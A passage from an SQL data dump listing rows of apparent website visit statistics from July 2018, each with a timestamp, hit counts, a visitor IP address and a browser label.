532354588,1,1,0,0,'185.76.70.150','chrome'),(278007,1532354901,1,1,0,0,'54.36.149.22','other'),(278008,1532354994,4,4,0,0,'194.187.170.125','other'),(278009,1532355052,1,1,0,0,'141.8.142.74','other'),(278010,1532355221,1,0,1,0,'66.249.75.195',''),(278011,1532355539,1,1,0,0,'54.36.149.64','other'),(278012,1532355876,1,1,0,0,'54.36.148.57','other'),(278013,1532355922,3,3,0,0,'194.187.170.125','other'),(278014,1532356004,1,1,0,0,'54.36.148.180','other'),(278015,1532356416,1,1,0,0,'188.230.43.254','other'),(278016,1532356574,1,1,0,0,'8.29.198.25','other'),(278017,1532356724,1,1,0,0,'54.36.148.252','other'),(278018,1532356817,1,1,0,0,'54.36.148.25','other'),(278019,1532357000,2,2,0,0,'194.187.170.125','other'),(278020,1532357034,1,1,0,0,'54.36.149.26','other'),(278021,1532357173,1,1,0,0,'54.36.149.100','other'),(278022,1532357801,1,1,0,0,'54.36.149.103','other'),(278023,1532357855,1,1,0,0,'54.36.148.105','other'),(278024,1532358135,1,1,0,0,'54.36.149.44','other'),(278025,1532358198,1,1,0,0,'54.36.149.82','other'),(278026,1532358819,1,1,0,0,'188.230.43.254','other'),(278027,1532358828,1,1,0,0,'37.55.186.125','chrome'),(278028,1532359032,1,0,1,0,'66.249.75.201',''),(278029,1532359341,1,1,0,0,'95.163.255.162','other'),(278030,1532359571,1,1,0,0,'54.36.148.23','other'),(278031,1532359817,1,1,0,0,'54.36.148.38','other'),(278032,1532359827,2,2,0,0,'216.244.66.241','other'),(278033,1532359871,1,1,0,0,'54.36.148.160','other'),(278034,1532359959,1,1,0,0,'54.36.148.50','other'),(278035,1532360324,1,1,0,0,'141.8.142.74','other'),(278036,1532360328,1,1,0,0,'178.154.171.88','other'),(278037,1532360399,1,1,0,0,'54.36.148.213','other'),(278038,1532360566,2,2,0,0,'54.36.148.57','other'),(278039,1532360590,1,1,0,0,'54.36.149.34','other'),(278040,1532360811,1,1,0,0,'54.36.148.30','other'),(278041,1532361214,1,1,0,0,'188.230.43.254','other'),(278042,1532361389,1,1,0,0,'54.36.148.89','other'),(278043,1532361461,1,1,0,0,'54.36.148.28','other'),(278044,1532361928,1,1,0,0,'40.77.167.203','other'),(278045,1532362059,1,1,0,0,'54.36.148.144','other'),(278046,1532362331,1,1,0,0,'54.36.148.244','other'),(278047,1532362474,1,1,0,0,'66.249.69.158','chrome'),(278048,1532362851,1,1,0,0,'180.76.15.14','other'),(278049,1532363038,3,3,0,0,'194.187.170.136','other'),(278050,1532363187,1,1,0,0,'178.238.233.160','chrome'),(278051,1532363297,1,1,0,0,'216.244.66.241','other'),(278052,1532363332,1,1,0,0,'8.29.198.25','other'),(278053,1532363620,1,1,0,0,'188.230.43.254','other'),(278054,1532364054,1,1,0,0,'54.36.148.88','other'),(278055,1532364152,1,1,0,0,'54.36.149.104','other'),(278056,1532364163,2,2,0,0,'194.187.170.136','other'),(278057,1532364361,1,1,0,0,'54.36.148.182','other'),(278058,1532365401,4,4,0,0,'194.187.170.136','other'),(278059,1532365442,3,3,0,0,'216.244.66.241','other'),(278060,1532365681,1,1,0,0,'54.36.148.35','other'),(278061,1532365801,1,1,0,0,'54.36.148.237','other'),(278062,1532365906,1,0,1,0,'66.249.69.156',''),(278063,1532366014,1,1,0,0,'188.230.43.254','other'),(278064,1532366148,1,1,0,0,'54.36.148.89','other'),(278065,1532366292,1,1,0,0,'141.8.142.74','other'),(278066,1532366563,3,3,0,0,'194.187.170.136','other'),(278067,1532366833,1,1,0,0,'91.196.178.93','firefox'),(278068,1532367139,1,1,0,0,'54.36.149.53','other'),(278069,1532367342,1,1,0,0,'54.36.149.77','other'),(278070,1532367414,1,1,0,0,'8.29.198.27','other'),(278071,1532367583,1,1,0,0,'54.36.148.159','other'),(278072,1532367768,1,1,0,0,'54.36.148.214','other'),(278073,1532367781,1,1,0,0,'54.36.148.82','other'),(278074,1532367925,1,1,0,0,'216.244.66.241','other'),(278075,1532368120,3,3,0,0,'204.12.208.10','other'),(278076,1532368260,3,3,0,0,'194.187.170.136','other'),(278077,1532368416,1,1,0,0,'188.230.43.254','other'),(278078,1532368578,1,1,0,0,'109.87.252.29','chrome'),(278079,1532369471,3,3,0,0,'194.187.170.136','other'),(278080,1532369688,1,1,0,0,'216.244.66.241','other'),(278081,1532369971,1,1,0,0,'54.36.148.84','other'),(278082,1532370452,3,3,0,0,'194.187.170.136','other'),(278083,1532370761,1,1,0,0,'54.36.149.17','other'),(278084,1532371066,1,1,0,0,'54.36.148.150','other'),(278085,1532371206,1,1,0,0,'54.36.148.124','other'),(278086,1532371407,2,2,0,0,'194.187.170.136','other'),(278087,1532372201,1,1,0,0,'54.36.149.38','other'),(278088,1532372572,6,6,0,0,'194.187.170.136','other'),(278089,1532372664,1,1,0,0,'54.36.148.201','other'),(278090,1532372682,2,2,0,0,'91.196.178.74','chrome'),(278091,1532372753,1,1,0,0,'54.36.148.215','other'),(278092,1532373269,2,2,0,0,'216.244.66.241','other'),(278093,1532373479,1,1,0,0,'54.36.148.170','other'),(278094,1532373565,1,1,0,0,'54.36.149.52','other'),(278095,1532373711,5,5,0,0,'194.187.170.136','other'),(278096,1532373933,1,1,0,0,'54.36.149.66','other'),(278097,1532374092,1,1,0,0,'54.36.148.22','other'),(278098,1532374170,1,1,0,0,'8.29.198.26','other'),(278099,1532374372,3,3,0,0,'69.30.198.242','other'),(278100,1532374441,1,0,1,0,'66.249.75.201',''),(278101,1532374790,1,1,0,0,'54.36.148.242','other'),(278102,1532375052,1,1,0,0,'194.187.170.136','other'),(278103,1532375222,1,0,1,0,'66.249.75.199',''),(278104,1532375371,1,1,0,0,'54.36.149.21','other'),(278105,1532375772,1,1,0,0,'54.36.148.31','other'),(278106,1532376041,1,1,0,0,'216.244.66.241','other'),(278107,1532376100,1,1,0,0,'54.36.148.124','other'),(278108,1532376262,1,1,0,0,'54.36.148.164','other'),(278109,1532376603,1,1,0,0,'54.36.148.183','other'),(278110,1532376658,1,0,1,0,'66.249.75.199',''),(278111,1532376864,4,4,0,0,'194.187.170.136','other'),(278112,1532376898,1,1,0,0,'176.108.98.80','chrome'),(278113,1532377429,1,1,0,0,'95.132.3.215','chrome'),(278114,1532377550,1,1,0,0,'54.36.148.144','other'),(278115,1532377575,1,1,0,0,'54.36.148.133','other'),(278116,1532377799,3,3,0,0,'194.187.170.136','other'),(278117,1532377869,1,1,0,0,'77.93.34.134','chrome'),(278118,1532377907,1,1,0,0,'54.36.148.160','other'),(278119,1532377916,1,1,0,0,'54.36.148.56','other'),(278120,1532378072,1,1,0,0,'54.36.148.231','other'),(278121,1532378275,1,1,0,0,'8.29.198.25','other'),(278122,1532378493,1,1,0,0,'54.36.149.106','other'),(278123,1532378504,1,1,0,0,'54.36.148.53','other'),(278124,1532378822,1,1,0,0,'54.36.148.33','other'),(278125,1532378832,2,2,0,0,'194.187.170.136','other'),(278126,1532378876,1,1,0,0,'141.8.142.74','other'),(278127,1532378939,1,1,0,0,'95.163.255.95','other'),(278128,1532378966,1,1,0,0,'216.244.66.241','other'),(278129,1532378972,1,1,0,0,'54.36.148.17','other'),(278130,1532379033,1,1,0,0,'54.36.148.93','other'),(278131,1532379040,1,1,0,0,'54.36.148.128','other'),(278132,1532379660,2,2,0,0,'54.36.148.153','other'),(278133,1532380308,1,1,0,0,'216.244.66.241','other'),(278134,1532380611,1,1,0,0,'141.8.142.74','other'),(278135,1532380801,1,1,0,0,'54.36.148.62','other'),(278136,1532381266,2,2,0,0,'216.244.66.241','other'),(278137,1532381526,1,1,0,0,'54.36.148.187','other'),(278138,1532381548,1,0,1,0,'66.249.75.201',''),(278139,1532381702,1,0,1,0,'66.249.75.195',''),(278140,1532381765,1,0,1,0,'66.249.75.199',''),(278141,1532381855,1,1,0,0,'54.36.148.174','other'),(278142,1532382177,1,1,0,0,'54.36.148.28','other'),(278143,1532382190,1,1,0,0,'54.36.148.131','other'),(278144,1532382967,1,1,0,0,'54.36.148.146','other'),(278145,1532383078,1,1,0,0,'213.180.203.40','other'),(278146,1532383256,1,1,0,0,'54.36.149.18','other'),(278147,1532383310,2,2,0,0,'216.244.66.241','other'),(278148,1532383597,1,0,1,0,'66.249.75.201',''),(278149,1532383877,1,1,0,0,'54.36.148.60','other'),(278150,1532384150,1,1,0,0,'54.36.149.86','other'),(278151,1532384311,1,1,0,0,'54.36.149.27','other'),(278152,1532384601,1,1,0,0,'54.36.148.16','other'),(278153,1532384746,1,1,0,0,'54.36.148.212','other'),(278154,1532384979,1,1,0,0,'54.36.149.49','other'),(278155,1532385006,1,1,0,0,'8.29.198.25','other'),(278156,1532385124,1,1,0,0,'54.36.149.107','other'),(278157,1532385232,1,1,0,0,'54.36.149.18','other'),(278158,1532385303,1,1,0,0,'54.36.148.217','other'),(278159,1532385317,2,2,0,0,'54.36.148.110','other'),(278160,1532385719,1,0,1,0,'66.249.75.201',''),(278161,1532386032,1,1,0,0,'54.36.148.90','other'),(278162,1532386273,1,1,0,0,'141.8.142.74','other'),(278163,1532386491,1,1,0,0,'54.36.149.37','other'),(278164,1532386715,1,1,0,0,'216.244.66.241','other'),(278165,1532386798,2,0,2,0,'66.249.75.199',''),(278166,1532387029,1,1,0,0,'54.36.148.104','other'),(278167,1532387292,1,1,0,0,'95.163.255.169','other'),(278168,1532387697,1,1,0,0,'157.55.39.153','other'),(278169,1532387896,1,1,0,0,'54.36.148.20','other'),(278170,1532388000,1,1,0,0,'54.36.148.71','other'),(278171,1532388176,1,1,0,0,'54.36.148.104','other'),(278172,1532388275,1,1,0,0,'54.36.148.33','other'),(278173,1532388286,1,1,0,0,'178.154.171.88','other'),(278174,1532388300,1,1,0,0,'54.36.149.57','other'),(278175,1532388337,1,1,0,0,'54.36.148.133','other'),(278176,1532388710,18,18,0,0,'69.30.211.2','other'),(278177,1532388820,1,1,0,0,'54.36.149.46','other'),(278178,1532388883,4,4,0,0,'173.212.202.220','other'),(278179,1532389004,1,1,0,0,'54.36.149.100','other'),(278180,1532389113,1,1,0,0,'8.29.198.26','other'),(278181,1532389397,1,1,0,0,'216.244.66.241','other'),(278182,1532389700,1,0,1,0,'66.249.69.158',''),(278183,1532390147,1,1,0,0,'54.36.149.2','other'),(278184,1532390220,1,1,0,0,'188.32.50.142','msie'),(278185,1532390422,1,1,0,0,'66.249.75.195','chrome'),(278186,1532390656,1,1,0,0,'37.9.113.182','other'),(278187,1532390862,1,1,0,0,'54.36.149.68','other'),(278188,1532391145,3,3,0,0,'216.244.66.241','other'),(278189,1532392259,1,1,0,0,'54.36.148.74','other'),(278190,1532392961,1,1,0,0,'54.36.149.2','other'),(278191,1532393025,1,1,0,0,'54.36.148.46','other'),(278192,1532393033,1,1,0,0,'157.55.39.131','other'),(278193,1532393044,2,2,0,0,'207.46.13.60','other'),(278194,1532393053,1,1,0,0,'207.46.13.123','other'),(278195,1532393147,1,1,0,0,'54.36.148.225','other'),(278196,1532393455,1,1,0,0,'54.36.149.15','other'),(278197,1532393579,1,1,0,0,'54.36.148.53','other'),(278198,1532393593,1,1,0,0,'54.36.148.209','other'),(278199,1532393667,1,1,0,0,'54.36.148.149','other'),(278200,1532393743,1,1,0,0,'54.36.149.95','other'),(278201,1532394127,1,1,0,0,'54.36.148.158','other'),(278202,1532394875,1,1,0,0,'54.36.148.99','other'),(278203,1532395044,1,1,0,0,'54.36.148.229','other'),(278204,1532395094,1,1,0,0,'54.36.148.224','other'),(278205,1532395849,1,1,0,0,'8.29.198.27','other'),(278206,1532396160,1,1,0,0,'54.36.148.194','other'),(278207,1532396229,1,1,0,0,'54.36.148.67','other'),(278208,1532396519,1,1,0,0,'54.36.148.183','other'),(278209,1532398475,1,1,0,0,'157.55.39.153','other'),(278210,1532398489,1,1,0,0,'52.34.24.33','chrome'),(278211,1532398648,1,1,0,0,'54.36.148.113','other'),(278212,1532398694,1,1,0,0,'54.36.148.247','other'),(278213,1532398990,1,1,0,0,'54.36.148.53','other'),(278214,1532399053,1,1,0,0,'54.36.148.181','other'),(278215,1532399709,1,1,0,0,'54.36.148.11','other'),(278216,1532399854,1,1,0,0,'54.36.149.10','other'),(278217,1532399911,1,1,0,0,'54.36.149.92','other'),(278218,1532399961,1,1,0,0,'8.29.198.26','other'),(278219,1532399993,2,2,0,0,'92.113.189.235','chrome'),(278220,1532400014,1,1,0,0,'54.36.149.47','other'),(278221,1532400204,1,1,0,0,'54.36.148.22','other'),(278222,1532400251,1,1,0,0,'54.36.148.158','other'),(278223,1532400503,1,1,0,0,'178.154.200.7','other'),(278224,1532400603,2,2,0,0,'95.213.141.126','opera'),(278225,1532400634,1,1,0,0,'54.36.149.93','other'),(278226,1532401092,1,1,0,0,'54.36.148.148','other'),(278227,1532401307,1,1,0,0,'95.163.255.102','other'),(278228,1532401315,1,1,0,0,'95.163.255.107','other'),(278229,1532401331,2,2,0,0,'95.163.255.118','other'),(278230,1532401346,1,1,0,0,'95.163.255.103','other'),(278231,1532401361,1,1,0,0,'95.163.255.116','other'),(278232,1532401368,1,1,0,0,'95.163.255.109','other'),(278233,1532401394,2,2,0,0,'141.8.142.74','other'),(278234,1532401647,1,1,0,0,'54.36.149.86','other'),(278235,1532402538,1,1,0,0,'216.244.66.241','other'),(278236,1532402673,1,1,0,0,'54.36.149.91','other'),(278237,1532402868,1,1,0,0,'54.36.148.224','other'),(278238,1532403193,1,1,0,0,'54.36.148.99','other'),(278239,1532403506,1,1,0,0,'54.36.148.203','other'),(278240,1532404208,1,1,0,0,'54.36.148.211','other'),(278241,1532404409,1,1,0,0,'95.132.3.215','chrome'),(278242,1532404631,1,1,0,0,'54.36.149.40','other'),(278243,1532404851,1,1,0,0,'54.36.148.28','other'),(278244,1532405020,1,1,0,0,'54.36.148.69','other'),(278245,1532405037,1,1,0,0,'54.36.149.89','other'),(278246,1532405154,1,1,0,0,'54.36.148.118','other'),(278247,1532405235,2,2,0,0,'91.196.178.131','firefox'),(278248,1532405292,1,1,0,0,'178.238.233.160','firefox'),(278249,1532405321,1,1,0,0,'54.36.148.197','other'),(278250,1532405342,1,1,0,0,'54.36.149.39','other'),(278251,1532405348,1,1,0,0,'54.36.148.76','other'),(278252,1532406011,46,46,0,0,'158.69.254.103','other'),(278253,1532406691,1,1,0,0,'8.29.198.27','other'),(278254,1532406911,1,1,0,0,'54.36.148.50','other'),(278255,1532407068,1,1,0,0,'54.36.148.203','other'),(278256,1532407234,1,1,0,0,'54.36.148.111','other'),(278257,1532407609,1,1,0,0,'216.244.66.241','other'),(278258,1532407859,1,1,0,0,'54.36.148.217','other'),(278259,1532407865,1,1,0,0,'54.36.149.77','other'),(278260,1532408218,1,1,0,0,'54.36.149.8','other'),(278261,1532408457,1,1,0,0,'54.36.148.208','other'),(278262,1532408588,1,1,0,0,'54.36.148.81','other'),(278263,1532408650,1,1,0,0,'54.36.148.201','other'),(278264,1532408654,6,6,0,0,'178.238.224.129','other'),(278265,1532408797,1,1,0,0,'95.163.255.188','other'),(278266,1532408870,1,1,0,0,'54.36.148.35','other'),(278267,1532409118,1,1,0,0,'54.36.148.214','other'),(278268,1532409330,1,1,0,0,'207.46.13.60','other'),(278269,1532409463,1,1,0,0,'54.36.148.154','other'),(278270,1532409615,1,1,0,0,'54.36.148.52','other'),(278271,1532409619,1,1,0,0,'54.36.149.73','other'),(278272,1532409885,1,1,0,0,'54.36.149.96','other'),(278273,1532410116,2,2,0,0,'91.196.178.169','chrome'),(278274,1532410193,1,1,0,0,'37.55.93.20','chrome'),(278275,1532410194,1,1,0,0,'141.8.142.74','other'),(278276,1532410326,1,1,0,0,'91.196.178.74','firefox'),(278277,1532410815,1,1,0,0,'8.29.198.25','other'),(278278,1532411218,1,1,0,0,'54.36.148.10','other'),(278279,1532411642,1,1,0,0,'54.36.148.80','other'),(278280,1532411647,1,1,0,0,'54.36.148.177','other'),(278281,1532411663,1,1,0,0,'54.36.149.83','other'),(278282,1532411676,1,1,0,0,'37.55.158.118','chrome'),(278283,1532411725,1,1,0,0,'54.36.149.101','other'),(278284,1532411835,1,1,0,0,'91.124.182.170','firefox'),(278285,1532411992,1,1,0,0,'54.36.149.63','other'),(278286,1532412086,1,1,0,0,'54.36.148.228','other'),(278287,1532412634,1,1,0,0,'54.36.148.230','other'),(278288,1532412930,1,1,0,0,'94.178.207.235','chrome'),(278289,1532413018,1,1,0,0,'54.36.148.182','other'),(278290,1532413070,1,1,0,0,'54.36.148.156','other'),(278291,1532413449,1,1,0,0,'54.36.148.10','other'),(278292,1532413453,1,1,0,0,'54.36.148.199','other'),(278293,1532413487,2,2,0,0,'46.211.153.80','chrome'),(278294,1532413806,1,1,0,0,'216.244.66.241','other'),(278295,1532413813,6,6,0,0,'91.196.178.183','chrome'),(278296,1532413886,2,2,0,0,'46.211.24.253','chrome'),(278297,1532413907,1,1,0,0,'54.36.148.132','other'),(278298,1532414081,1,1,0,0,'54.36.148.115','other'),(278299,1532414609,1,1,0,0,'54.36.148.164','other'),(278300,1532414717,5,5,0,0,'91.196.178.183','chrome'),(278301,1532414793,1,1,0,0,'54.36.148.169','other'),(278302,1532414854,1,1,0,0,'54.36.148.31','other'),(278303,1532415403,1,1,0,0,'216.244.66.241','other'),(278304,1532415641,2,2,0,0,'130.180.220.37','chrome'),(278305,1532415650,12,12,0,0,'91.196.178.183','chrome'),(278306,1532415656,1,1,0,0,'5.58.46.252','chrome'),(278307,1532415743,1,1,0,0,'54.36.149.33','other'),(278308,1532415921,1,1,0,0,'54.36.149.46','other'),(278309,1532415961,1,1,0,0,'54.36.148.140','other'),(278310,1532415978,1,1,0,0,'54.36.148.12','other'),(278311,1532416090,1,1,0,0,'180.76.15.135','other'),(278312,1532416275,1,1,0,0,'54.36.149.30','other'),(278313,1532416280,1,1,0,0,'54.36.148.236','other'),(278314,1532416350,1,1,0,0,'178.154.171.88','other'),(278315,1532416590,1,1,0,0,'54.36.148.93','other'),(278316,1532416734,1,1,0,0,'54.36.149.57','other'),(278317,1532416840,1,1,0,0,'207.46.13.123','other'),(278318,1532417266,2,2,0,0,'91.196.178.73','chrome'),(278319,1532417270,1,1,0,0,'77.111.244.38','chrome'),(278320,1532417532,1,1,0,0,'8.29.198.25','other'),(278321,1532417718,1,1,0,0,'54.36.149.39','other'),(278322,1532418134,1,1,0,0,'54.36.148.58','other'),(278323,1532419108,1,1,0,0,'54.36.149.93','other'),(278324,1532419130,1,1,0,0,'54.36.148.216','other'),(278325,1532419204,2,2,0,0,'91.196.178.62','chrome'),(278326,1532419574,1,1,0,0,'54.36.148.78','other'),(278327,1532420310,1,1,0,0,'54.36.148.197','other'),(278328,1532420436,1,1,0,0,'54.36.149.93','other'),(278329,1532420441,1,1,0,0,'54.36.148.199','other'),(278330,1532420463,1,0,1,0,'66.249.69.158',''),(278331,1532420487,1,0,1,0,'66.249.75.199',''),(278332,1532420540,1,1,0,0,'54.36.148.73','other'),(278333,1532420810,1,1,0,0,'91.196.178.163','chrome'),(278334,1532420984,1,1,0,0,'54.36.148.178','other'),(278335,1532421003,1,1,0,0,'54.36.148.41','other'),(278336,1532421119,1,1,0,0,'54.36.148.99','other'),(278337,1532421325,1,1,0,0,'54.36.148.191','other'),(278338,1532421391,2,2,0,0,'91.196.178.73','chrome'),(278339,1532421410,2,2,0,0,'216.244.66.241','other'),(278340,1532421649,1,1,0,0,'8.29.198.25','other'),(278341,1532421667,1,1,0,0,'54.36.148.95','other'),(278342,1532421975,2,2,0,0,'199.58.86.206','other'),(278343,1532422009,1,1,0,0,'91.196.178.101','chrome'),(278344,1532422129,1,1,0,0,'91.196.177.147','chrome'),(278345,1532422640,1,1,0,0,'95.132.18.9','firefox'),(278346,1532422658,1,1,0,0,'54.36.148.187','other'),(278347,1532422783,1,1,0,0,'91.196.178.74','firefox'),(278348,1532423301,1,1,0,0,'54.36.148.213','other'),(278349,1532423576,1,1,0,0,'91.196.179.134','chrome'),(278350,1532423803,1,1,0,0,'54.36.149.33','other'),(278351,1532423903,1,1,0,0,'54.36.149.70','other'),(278352,1532424146,1,1,0,0,'54.36.148.84','other'),(278353,1532424646,1,1,0,0,'54.36.149.5','other'),(278354,1532424696,1,1,0,0,'54.36.148.194','other'),(278355,1532424709,1,1,0,0,'54.36.149.32','other'),(278356,1532424874,1,1,0,0,'180.76.15.6','other'),(278357,1532424905,1,1,0,0,'77.111.247.62','chrome'),(278358,1532425171,1,1,0,0,'54.165.59.7','other'),(278359,1532425920,2,2,0,0,'91.196.178.73','chrome'),(278360,1532426061,1,1,0,0,'54.36.149.30','other'),(278361,1532426589,1,1,0,0,'66.249.69.158','chrome'),(278362,1532426600,1,1,0,0,'54.36.148.93','other'),(278363,1532426884,1,1,0,0,'54.36.148.225','other'),(278364,1532427036,1,1,0,0,'62.80.174.114','chrome'),(278365,1532427109,1,1,0,0,'54.36.148.232','other'),(278366,1532427534,1,1,0,0,'54.36.148.178','other'),(278367,1532427694,1,1,0,0,'54.36.149.64','other'),(278368,1532427992,1,1,0,0,'54.36.149.60','other'),(278369,1532428129,1,1,0,0,'54.36.148.59','other'),(278370,1532428374,1,1,0,0,'8.29.198.25','other'),(278371,1532428679,1,1,0,0,'54.36.149.71','other'),(278372,1532428764,1,1,0,0,'95.163.255.104','other'),(278373,1532428789,1,1,0,0,'54.36.148.151','other'),(278374,1532428891,1,1,0,0,'54.36.149.89','other'),(278375,1532428948,3,3,0,0,'216.244.66.241','other'),(278376,1532429087,1,1,0,0,'141.8.142.74','other'),(278377,1532429215,1,1,0,0,'54.36.149.46','other'),(278378,1532429242,1,1,0,0,'54.36.148.204','other'),(278379,1532430081,1,1,0,0,'66.249.69.157','chrome'),(278380,1532430637,1,1,0,0,'54.165.59.7','other'),(278381,1532430754,1,1,0,0,'54.36.149.39','other'),(278382,1532430893,1,1,0,0,'37.9.113.114','other'),(278383,1532430973,1,1,0,0,'54.36.149.12','other'),(278384,1532431002,1,1,0,0,'54.36.148.218','other'),(278385,1532431238,1,1,0,0,'54.36.149.18','other'),(278386,1532431692,1,1,0,0,'54.36.148.234','other'),(278387,1532431826,1,1,0,0,'54.36.148.211','other'),(278388,1532432312,1,1,0,0,'54.36.148.113','other'),(278389,1532432436,1,1,0,0,'54.36.148.135','other'),(278390,1532432503,1,1,0,0,'8.29.198.25','other'),(278391,1532432641,1,1,0,0,'54.36.148.212','other'),(278392,1532432669,1,1,0,0,'54.36.149.7','other'),(278393,1532432836,2,2,0,0,'91.196.178.88','chrome'),(278394,1532432990,1,1,0,0,'54.36.148.201','other'),(278395,1532433161,1,1,0,0,'54.36.149.34','other'),(278396,1532433509,1,1,0,0,'95.133.228.114','firefox'),(278397,1532433561,1,1,0,0,'54.36.148.107','other'),(278398,1532433586,1,1,0,0,'91.196.177.147','chrome'),(278399,1532433906,3,3,0,0,'216.244.66.241','other'),(278400,1532434098,1,1,0,0,'54.36.149.20','other'),(278401,1532434145,1,1,0,0,'54.36.149.52','other'),(278402,1532434247,1,1,0,0,'54.36.149.96','other'),(278403,1532434612,1,1,0,0,'54.36.148.200','other'),(278404,1532434660,1,0,1,0,'66.249.75.195',''),(278405,1532434958,1,1,0,0,'54.36.149.65','other'),(278406,1532435512,1,1,0,0,'54.36.148.132','other'),(278407,1532435599,1,1,0,0,'54.36.148.201','other'),(278408,1532436012,1,1,0,0,'54.36.148.243','other'),(278409,1532436250,1,1,0,0,'54.165.59.7','other'),(278410,1532436260,1,1,0,0,'141.8.142.74','other'),(278411,1532436484,2,2,0,0,'216.244.66.241','other'),(278412,1532436592,1,1,0,0,'54.36.149.106','other'),(278413,1532436792,1,1,0,0,'91.196.178.171','chrome'),(278414,1532436913,1,1,0,0,'54.36.148.98','other'),(278415,1532437136,1,1,0,0,'54.36.148.199','other'),(278416,1532437403,2,2,0,0,'216.244.66.241','other'),(278417,1532437608,1,1,0,0,'157.55.39.153','other'),(278418,1532437846,1,1,0,0,'54.36.149.60','other'),(278419,1532437932,1,1,0,0,'54.36.148.248','other'),(278420,1532438029,1,1,0,0,'178.95.66.69','chrome'),(278421,1532438116,2,2,0,0,'54.165.59.7','other'),(278422,1532438135,1,1,0,0,'64.246.165.10','firefox'),(278423,1532438516,1,1,0,0,'54.36.149.101','other'),(278424,1532438559,1,1,0,0,'54.36.148.105','other'),(278425,1532438571,1,1,0,0,'194.44.157.223','chrome'),(278426,1532439103,2,2,0,0,'141.8.142.74','other'),(278427,1532439293,1,1,0,0,'8.29.198.26','other'),(278428,1532439311,1,0,1,0,'66.249.75.195',''),(278429,1532439365,1,1,0,0,'54.36.148.36','other'),(278430,1532439411,1,1,0,0,'216.244.66.241','other'),(278431,1532439529,1,1,0,0,'54.36.148.133','other'),(278432,1532439916,1,1,0,0,'54.36.148.149','other'),(278433,1532440686,1,1,0,0,'54.36.148.239','other'),(278434,1532440883,1,1,0,0,'51.15.15.79','chrome'),(278435,1532440896,1,1,0,0,'54.36.148.87','other'),(278436,1532441219,1,1,0,0,'91.124.182.170','firefox'),(278437,1532441271,1,1,0,0,'54.36.148.99','other'),(278438,1532441401,1,1,0,0,'54.36.148.204','other'),(278439,1532441811,1,0,1,0,'66.249.75.199',''),(278440,1532442451,2,2,0,0,'216.244.66.241','other'),(278441,1532442497,1,1,0,0,'54.36.148.81','other'),(278442,1532442498,2,1,1,0,'66.249.75.199',''),(278443,1532442555,1,1,0,0,'54.36.148.106','other'),(278444,1532442699,1,1,0,0,'54.36.149.67','other'),(278445,1532442728,1,1,0,0,'109.201.143.112','firefox'),(278446,1532442915,1,1,0,0,'54.36.149.73','other'),(278447,1532443002,1,1,0,0,'54.36.148.152','other'),(278448,1532443348,1,1,0,0,'87.250.224.46','other'),(278450,1532443362,1,1,0,0,'8.29.198.26','other'),(278451,1532443496,1,1,0,0,'54.36.148.130','other'),(278452,1532443600,1,1,0,0,'54.36.148.43','other'),(278453,1532443626,1,1,0,0,'46.200.19.196','chrome'),(278454,1532443780,1,1,0,0,'54.36.149.17','other'),(278455,1532444037,1,1,0,0,'54.36.148.167','other'),(278456,1532444111,1,1,0,0,'54.36.148.25','other'),(278457,1532444158,1,1,0,0,'54.36.149.102','other'),(278458,1532444408,1,1,0,0,'54.36.149.6','other'),(278459,1532444541,1,1,0,0,'54.36.149.93','other'),(278460,1532444606,1,1,0,0,'54.36.149.7','other'),(278461,1532445048,1,1,0,0,'54.36.148.243','other'),(278462,1532445085,1,1,0,0,'37.52.22.12','chrome'),(278463,1532445128,1,1,0,0,'54.36.148.42','other'),(278464,1532445252,1,1,0,0,'54.36.149.31','other'),(278465,1532445539,1,1,0,0,'54.36.149.93','other'),(278466,1532445674,1,1,0,0,'54.36.148.171','other'),(278467,1532445905,1,1,0,0,'95.163.255.94','other'),(278468,1532446567,1,0,1,0,'66.249.75.201',''),(278469,1532446929,1,1,0,0,'54.36.149.100','other'),(278470,1532446981,1,1,0,0,'54.36.149.13','other'),(278471,1532447037,1,1,0,0,'54.36.148.104','other'),(278472,1532447548,1,1,0,0,'54.36.149.0','other'),(278473,1532447619,1,1,0,0,'216.244.66.241','other'),(278474,1532447746,10,10,0,0,'45.33.74.241','firefox'),(278475,1532447970,1,1,0,0,'54.36.148.241','other'),(278476,1532447996,1,1,0,0,'54.36.148.12','other'),(278477,1532448004,1,1,0,0,'54.36.149.63','other'),(278478,1532448020,1,1,0,0,'54.36.148.52','other'),(278479,1532448028,1,1,0,0,'54.36.148.249','other'),(278480,1532448473,1,1,0,0,'54.36.148.65','other'),(278481,1532448489,1,1,0,0,'54.36.149.77','other'),(278482,1532448521,1,1,0,0,'46.211.98.142','chrome'),(278483,1532448538,2,2,0,0,'46.211.1.186','chrome'),(278484,1532448629,1,1,0,0,'54.36.148.202','other'),(278485,1532448857,1,1,0,0,'91.196.178.85','firefox'),(278486,1532449051,1,1,0,0,'54.36.149.91','other'),(278487,1532449203,1,1,0,0,'54.36.148.52','other'),(278488,1532449277,1,1,0,0,'54.36.149.31','other'),(278489,1532449616,1,1,0,0,'213.180.203.8','other'),(278490,1532449734,1,1,0,0,'216.244.66.241','other'),(278491,1532449843,1,1,0,0,'54.36.148.250','other'),(278492,1532449861,1,1,0,0,'37.73.173.70','chrome'),(278493,1532450161,1,1,0,0,'8.29.198.26','other'),(278494,1532450319,1,1,0,0,'54.36.149.23','other'),(278495,1532450554,1,1,0,0,'46.201.174.115','chrome'),(278496,1532450911,1,0,1,0,'66.249.69.156',''),(278497,1532450914,1,1,0,0,'141.8.142.74','other'),(278498,1532451090,1,1,0,0,'95.163.255.150','other'),(278499,1532451405,1,1,0,0,'54.36.148.152','other'),(278500,1532451460,1,1,0,0,'54.36.148.110','other'),(278501,1532451507,1,1,0,0,'91.196.178.80','firefox'),(278502,1532451601,1,1,0,0,'54.36.148.11','other'),(278503,1532452271,1,1,0,0,'54.36.148.102','other'),(278504,1532452719,1,0,1,0,'66.249.75.195',''),(278505,1532453078,1,1,0,0,'54.36.149.19','other'),(278506,1532453724,1,1,0,0,'54.36.148.22','other'),(278507,1532453978,1,1,0,0,'54.36.149.27','other'),(278508,1532454013,1,1,0,0,'207.46.13.123','other'),(278509,1532454082,1,1,0,0,'5.188.210.35','chrome'),(278510,1532454205,1,1,0,0,'8.29.198.27','other'),(278511,1532454352,1,1,0,0,'54.36.149.40','other'),(278512,1532454522,1,1,0,0,'157.55.39.131','other'),(278513,1532455032,2,2,0,0,'216.244.66.241','other'),(278514,1532455238,1,1,0,0,'54.36.148.35','other'),(278515,1532456012,1,1,0,0,'54.36.148.32','other'),(278516,1532456078,1,1,0,0,'54.36.149.77','other'),(278517,1532456105,1,1,0,0,'195.66.156.9','chrome'),(278518,1532456488,1,1,0,0,'54.36.149.48','other'),(278519,1532456527,1,1,0,0,'54.36.148.121','other'),(278520,1532456608,1,1,0,0,'